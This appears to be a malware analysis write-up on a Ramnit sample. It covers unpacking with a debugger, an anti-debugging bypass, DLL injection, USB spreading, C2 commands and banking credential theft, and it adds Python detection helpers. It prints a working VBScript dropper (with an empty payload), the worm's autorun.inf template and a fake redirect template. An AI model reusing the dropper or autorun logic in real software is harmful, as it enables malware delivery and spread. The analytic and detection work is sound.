
Ramnit Analysis

  • Filename: Zeichnungen Muster.exe
  • Filesize: 1.97 MiB
  • Hash: cfd13da57bb620ec32a6ad174d4d4cac2c715af8e7aaa57931574152f5fffdd9
  • Malware Family: Ramnit [Worm] [Trojan]

Executive Summary

The Ramnit installer employs dual-layer packing: a proprietary packer plus UPX compression. Upon execution, it unpacks its payload, replicates to system directories, and establishes persistence via registry autorun entries.

The installer’s core function is injecting DLLs into legitimate system or browser processes. These DLLs establish inter-process communication and fetch additional modules from the C&C infrastructure. The retrieved modules enable credential harvesting and banking session hijacking.

Observation

When checking the file, the tool reports that it was compressed or packed with an unknown packer. It also reports that the file uses the AutoIT version 3.XX format.

Checking the entropy gives 7.63340, meaning the file is heavily packed.
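The entropy check above can be reproduced offline. The following is an added example, not code from the original post: it computes Shannon entropy for a whole file and for fixed-size windows, and flags a sample as likely packed when the overall value or at least half of the windows reach the threshold (7.0 is an assumed cut-off; the post's sample scored 7.63340). The input is a constructed stand-in, a low-entropy stub followed by pseudo-random bytes, not the analysed binary.

```python
import math
import random
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for constant data, 8.0 for uniform."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())

def high_entropy_windows(data: bytes, window: int = 4096, threshold: float = 7.0):
    """(offset, entropy) for every fixed-size window at or above the threshold."""
    hits = []
    for off in range(0, len(data), window):
        e = shannon_entropy(data[off:off + window])
        if e >= threshold:
            hits.append((off, round(e, 5)))
    return hits

def analyze(data: bytes, window: int = 4096, threshold: float = 7.0) -> dict:
    """Whole-file entropy plus a packed verdict. A packed PE often has a small
    low-entropy unpacking stub in front of a dense payload, so the verdict also
    triggers when at least half of the windows are high-entropy."""
    total = shannon_entropy(data)
    hits = high_entropy_windows(data, window, threshold)
    n_windows = max(1, -(-len(data) // window))  # ceiling division
    packed = total >= threshold or len(hits) / n_windows >= 0.5
    return {"entropy": round(total, 5), "packed": packed, "windows": hits}

def build_sample() -> bytes:
    """Constructed stand-in for a packed PE: a 4 KiB low-entropy stub followed
    by 8 KiB of seeded pseudo-random bytes (reproducible, not real malware)."""
    rng = random.Random(1337)
    stub = b"MZ" + b"\x00" * 4094
    payload = bytes(rng.getrandbits(8) for _ in range(8192))
    return stub + payload

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    print(analyze(data))
```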

Unpack

Since the binary is 32-bit, the most suitable way to unpack it is with x32dbg.

Breakpoints set on the loader:

  • bp VirtualAlloc
  • bp VirtualProtect
  • bp CreateProcessInternalW
  • bp IsDebuggerPresent
  • bp WriteProcessMemory
  • bp NtResumeThread

On the first run, execution stops on CreateProcessInternalW and the file “mgr.exe” is dropped.

On the second run, it stops on ZwResumeThread or NtResumeThread.

Open a second x32dbg instance and attach to the dropped program (mgr.exe).

In the first exe (the loader), run again; it stops on IsDebuggerPresent, which is the anti-debugging check.

Back in the attached “mgr.exe”, create the breakpoints shown below:

Breakpoints set:

  • bp VirtualAlloc
  • bp VirtualProtect
  • bp CreateProcessInternalW
  • bp IsDebuggerPresent
  • bp WriteProcessMemory

Run once; it stops on VirtualProtect twice before it reaches the allocation.

Run again and it stops on VirtualAlloc. At first EAX points to gibberish hex.

Back in the loader, hit the ‘execute until return’ button; at the return of the IsDebuggerPresent API, change the loader's EAX to 0 to bypass the anti-debugging check. Run again and it stops on the anti-debug check a second time; repeat the same step (set EAX to 0) and hit Run.

Back in “mgr.exe”, hit Run; when it stops on VirtualAlloc, follow EAX in the dump.

Each time VirtualAlloc is hit, keep hitting the ‘execute until return’ button (1) and follow EAX in the dump, watching the returned memory.

It later stops on VirtualProtect and the program is visible in the dump.

Dump the process using x32dbg or Process Hacker (follow the same address, 0x1d0000).

After dumping, checking the file shows that it is packed with UPX v3.0.

The file can be unpacked now:

After unpacking:

Static Analysis

Ramnit uses custom packing and then UPX to hide its payload, which unpacks to a clean PE that injects two DLLs (modules.dll and rmnsoft.dll) into processes; these DLLs communicate via a named pipe and download additional modules/webinjects from C2 servers using TCP/DGA. In this section, we perform static analysis of the unpacked file.

Clean PE

Windows Privilege Thread [start]

At the start, several calls use SeDebugPrivilege to turn on a specific Windows privilege for the current process so the program can perform higher-permission actions. There is also a function call that creates a mutex.

Notice there are two unk_4… data references; these are the two embedded applications covered later:

  • unk_404270: rmnsoft.dll
  • unk_415270: modules.dll

The routine coordinates ApplyExploit and CheckBypassed – if they both run successfully it creates two svchost.exe processes and writes rmnsoft.dll and modules.dll into them respectively.

Thread Execution Hijacking [sub_4026D8]

sub_4026D8 suspends or resumes the threads of a specific process.

  • a1 : a process ID (PID).
  • a2 : tells whether to suspend or resume the threads.

The code first gets the current thread ID using GetCurrentThreadId(). This is so it does not affect its own thread. Then it creates a snapshot of all threads in the system using CreateToolhelp32Snapshot.

To make it short, this function walks through every thread of a process and suspends or resumes them, except the current thread.

Locate Browser [sub_4016D6]

This function locates a web browser executable and stores the path in lpData. It attempts three methods in sequence:

Method 1: Default HTTP Handler

  • Registry key: HKEY_CLASSES_ROOT\http\shell\open\command
  • value: "C:\Program Files\Google\Chrome\Application\chrome.exe" -- "%1"
  • Validation: Rejects Chrome specifically and verifies that the file exists. If rejected or missing, it falls through to the next method below.

Method 2: IE Environment Path

  • Expands: %ProgramFiles%\Internet Explorer\iexplore.exe
  • Checks file existence

Method 3: IE Registry Path

  • Registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE

The deliberate Chrome exclusion suggests the malware targets browsers with weaker process isolation, as Chrome’s security architecture likely interferes with its injection techniques.

rmnsoft.dll [unk_404270]

DLLEntryPoint

The key factor is what happens when the DLL loads into a process (fdwReason == 1, meaning DLL_PROCESS_ATTACH).

Documentation: https://learn.microsoft.com/en-us/windows/win32/dlls/dllmain

First it creates mutexes using CreateMutexA. This is used to make sure only one instance runs. If the mutex already exists, it calls ExitProcess.

Then it reads configuration from the Windows registry (RegOpenKeyExA, RegQueryValueExA). The value can replace lpReserved, which later becomes a file path or config input.

Next it launches multiple worker threads with CreateThread.

These threads perform different background tasks:

  • connect to google.com:80 (likely connectivity check or disguise traffic)
  • open network sockets
  • send an HTTP GET request
  • other background routines

After that it calls CreateFileA and repeatedly tries to open a file until it succeeds. This likely waits for a file or resource to appear.

GET Request [sub_10004F95]

sub_10004F95 builds an HTTP GET request to a host, sends it through a socket, receives the response for a limited time, and calculates the download speed (KB/s).

USB Worm [sub_1000A2D5]

In this function (sub_1000A2D5) autorun.inf is created. The generated autorun.inf structure:

[autorun]
action=Open                                    ← Fake "safe" label
icon=%WinDir%\system32\shell32.dll,4           ← Legitimate Windows icon
shellexecute=[malware_path]                    ← Executes on double-click
shell\explore\command=[malware_path]           ← Hijacks "Explore" right-click
USEAUTOPLAY=1                                  ← Auto-triggers on insert
shell\Open\command=[malware_path]              ← Hijacks "Open" action

This is USB worm functionality.

When a victim inserts the infected drive, Windows AutoPlay silently executes the malware. The junk data obfuscation and the legitimate icon disguise it from casual inspection and basic AV scanning.
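A triage check for the autorun.inf pattern above, written for this post as an added example (not code from the original): a tolerant parser that skips the junk padding lines, followed by scoring of the execution keys, the USEAUTOPLAY flag and the borrowed shell32.dll icon. The sample file is constructed to mirror the structure shown, with a placeholder target path in place of [malware_path].

```python
import re

# Keys under [autorun] that make legacy AutoRun/AutoPlay execute something.
EXEC_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\]+\\command)$")

def parse_autorun(text: str) -> dict:
    """Keep key=value pairs under [autorun]; skip comments and junk lines."""
    entries, in_autorun = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line.lower() == "[autorun]"
            continue
        if in_autorun and "=" in line:  # junk padding without '=' is dropped here
            key, _, value = line.partition("=")
            entries[key.strip().lower()] = value.strip()
    return entries

def assess_autorun(text: str):
    """Return (verdict, findings) for one autorun.inf."""
    e = parse_autorun(text)
    targets = {k: v for k, v in e.items() if EXEC_KEY.match(k)}
    findings = [f"execution key {k} -> {v}" for k, v in targets.items()]
    autoplay = e.get("useautoplay") == "1"
    if autoplay:
        findings.append("USEAUTOPLAY=1 forces AutoPlay on insertion")
    if targets and "shell32.dll" in e.get("icon", "").lower():
        findings.append("icon borrowed from shell32.dll to look legitimate")
    if len(targets) >= 2 and len({v.lower() for v in targets.values()}) == 1:
        findings.append("all execution keys point to the same file")
    if len(targets) >= 2 or (targets and autoplay):
        verdict = "malicious"
    elif targets:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return verdict, findings

# Constructed sample mirroring the structure above; the target is a placeholder.
SAMPLE = r"""[autorun]
action=Open
icon=%WinDir%\system32\shell32.dll,4
kq8Zt2vPxL
shellexecute=RECYCLER\placeholder.exe
shell\explore\command=RECYCLER\placeholder.exe
USEAUTOPLAY=1
shell\Open\command=RECYCLER\placeholder.exe
"""
```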

Persistent [sub_1000362F]

sub_1000362F reads a user folder path from the registry, builds a new path, copies a file there, and marks it hidden. The path is read from the following registry location:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

Token Build [sub_1000D1CB]

sub_1000D1CB initializes the malware runtime by setting up memory and networking, collecting host system identifiers (drive/volume data) to build a unique token, and preparing configuration/storage files (complete.dat, dmlconf.dat):

  • %programfiles%\internet explorer\dmlconf.dat

Locating Directory [sub_100044E6]

sub_100044E6 builds a path in common system/user folders, appends lpString2 if given, ensures the directory exists, and returns the final path string.

C2 Communicating [sub_100069A8]

In sub_100069A8, the following C&C commands are handled:

  • getexec: download an executable file from a URL given by the C&C server, save it as [folder]\[subfolder]\[name].exe and execute it. Here, [folder] is a directory chosen by the method used when the second copy of the installer was made, while [subfolder] and [name] are two arguments of the command. Through this command, an arbitrary executable file distributed on any computer controlled by the gang behind Ramnit can be executed in the background on the victim’s computer. This has the capability to provide a pay-per-install service for other malware.
  • kos: shut down (kill) the operating system.
  • screen: take a screenshot and save it locally.
  • update: get the latest copy of the Ramnit installer from a URL given by the C&C server and replace the old Ramnit installer.

It also queries the registry for:

  • HKEY_LOCAL_MACHINE\Software\WASAntidot\Disable

If the key exists, it shows a message box saying “Antidot is activate”; if not, it dynamically loads SHDeleteKeyA from shlwapi.dll and, after enabling backup/restore privileges, attempts to delete certain registry branches (SOFTWARE, SYSTEM, HARDWARE) under different hives.

So the registry part mainly checks a “disable” flag and can delete key paths if conditions allow.

VBScript Dropper [sub_10009F52]

It opens a file, writes the main data plus extra payload (like a VBScript dropper), appends metadata/obfuscation, sets the file hidden/system, and restores timestamps.

The Script (Beautified)

<SCRIPT Language="VBScript">
<!--

DropFileName = "svchost.exe"
WriteData = ""

Set FSO = CreateObject("Scripting.FileSystemObject")

' Build drop path (Temp folder)
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName

If FSO.FileExists(DropPath) = False Then
    Set FileObj = FSO.CreateTextFile(DropPath, True)

    ' Decode hex string into bytes
    For i = 1 To Len(WriteData) Step 2
        FileObj.Write Chr(CLng("&H" & Mid(WriteData, i, 2)))
    Next

    FileObj.Close
End If

Set WSHshell = CreateObject("WScript.Shell")

' Execute dropped file (hidden)
WSHshell.Run DropPath, 0

//-->
</SCRIPT>

<!---->
RmN
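For incident responders who find this script appended to a file, the following added example (not from the original post) locates the VBScript block, pulls out DropFileName and the hex-encoded WriteData, decodes the payload the same way the script's Chr/CLng loop does, and checks for the trailing RmN marker. The infected document is a constructed sample whose WriteData holds only a few placeholder bytes.

```python
import re

SCRIPT_RE = re.compile(r'<SCRIPT\s+Language="VBScript">(.*?)</SCRIPT>', re.I | re.S)
NAME_RE = re.compile(r'DropFileName\s*=\s*"([^"]*)"', re.I)
DATA_RE = re.compile(r'WriteData\s*=\s*"([0-9A-Fa-f]*)"', re.I)

def find_vbs_dropper(html: str):
    """Return details of an appended VBScript dropper, or None if absent."""
    m = SCRIPT_RE.search(html)
    if not m:
        return None
    body = m.group(1)
    # Require the hex-decoding write loop; plain VBScript alone is not enough.
    if 'Chr(CLng("&H"' not in body or "FileSystemObject" not in body:
        return None
    name = NAME_RE.search(body)
    data = DATA_RE.search(body)
    hexdata = data.group(1) if data else ""
    payload = bytes.fromhex(hexdata) if len(hexdata) % 2 == 0 else b""
    return {
        "drop_name": name.group(1) if name else None,
        "payload": payload,               # decoded bytes, ready to hash/scan
        "marker": html.rstrip().endswith("RmN"),
        "script_offset": m.start(),        # where the clean file ends
    }

# Constructed sample: a clean page with the dropper appended; WriteData holds
# placeholder bytes (an MZ header stub), not a real executable.
CLEAN = "<html><body><p>Quarterly report</p></body></html>\n"
INFECTED = CLEAN + '''<SCRIPT Language="VBScript">
<!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\\" & DropFileName
If FSO.FileExists(DropPath) = False Then
    Set FileObj = FSO.CreateTextFile(DropPath, True)
    For i = 1 To Len(WriteData) Step 2
        FileObj.Write Chr(CLng("&H" & Mid(WriteData, i, 2)))
    Next
    FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//-->
</SCRIPT>
<!---->
RmN'''
```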

Self Replicate [sub_1000A49F]

sub_1000A49F endlessly scans all drives, finds removable ones, then copies or creates files in the RECYCLER folder with disguised names and extensions, updates some internal metadata, and repeats every 10 seconds.

In short, it spreads/mirrors itself to USB drives.

modules.dll [unk_415270]

C2 Server [sub_10006E43]

This is a core man-in-the-browser (MitB) function that intercepts HTTP requests, parses them for banking/financial data, and exfiltrates captured credentials to a command-and-control (C2) server.

Fake Redirect Response [sub_100043FE]

sub_100043FE produces fake redirect responses.

Structure:

HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: max-age=0
Pragma: no-cache
Connection: Keep-Alive
Content-Type: text/html
Location: <value from a1>

Date: <generated date>
Last-Modified: <generated date>
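The fixed header values in that template make a usable fingerprint for proxy or packet-capture review. The following is an added example, not code from the original post: it parses a raw HTTP response and flags a 301/302 whose version token, Server, Expires and cache headers match the template above (two or more matches is the assumed alert threshold). Both responses are constructed samples.

```python
# Header values copied from the redirect template shown above.
TEMPLATE_SERVER = "Apache/2.2.14"
TEMPLATE_EXPIRES = "Mon, 26 Jul 1997 05:00:00 GMT"

def parse_response(raw: str):
    """Split a raw HTTP response into (version, status, lower-cased headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.replace("\r\n", "\n").split("\n")
    version, _, rest = lines[0].partition(" ")
    status = rest.split(" ", 1)[0]
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            k, _, v = line.partition(":")
            headers[k.strip().lower()] = v.strip()
    return version, status, headers

def score_redirect(raw: str):
    """Return (flagged, indicators) for one response; only redirects are scored."""
    version, status, h = parse_response(raw)
    hits = []
    if status not in ("301", "302"):
        return False, hits
    if version not in ("HTTP/1.0", "HTTP/1.1"):
        hits.append(f"non-standard version token {version!r}")  # e.g. HTTP/1.x
    if h.get("server") == TEMPLATE_SERVER:
        hits.append("Server matches template Apache/2.2.14")
    if h.get("expires") == TEMPLATE_EXPIRES:
        hits.append("Expires is the fixed 1997 template date")
    if h.get("cache-control") == "max-age=0" and h.get("pragma") == "no-cache":
        hits.append("template no-cache header pair")
    if "location" not in h:
        hits.append("redirect without Location header")
    return len(hits) >= 2, hits

# Constructed sample following the template; the Location is a placeholder.
SAMPLE = (
    "HTTP/1.x 301 Moved Permanently\r\n"
    "Server: Apache/2.2.14\r\n"
    "Expires: Mon, 26 Jul 1997 05:00:00 GMT\r\n"
    "Cache-Control: max-age=0\r\n"
    "Pragma: no-cache\r\n"
    "Connection: Keep-Alive\r\n"
    "Content-Type: text/html\r\n"
    "Location: http://login.example.invalid/\r\n"
    "Date: Tue, 01 Jan 2019 00:00:00 GMT\r\n"
    "Last-Modified: Tue, 01 Jan 2019 00:00:00 GMT\r\n\r\n"
)
BENIGN = "HTTP/1.1 301 Moved Permanently\r\nServer: nginx\r\nLocation: https://example.invalid/\r\n\r\n"
```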

APPENDIX

pain of Defender

This post is licensed under CC BY 4.0 by the author.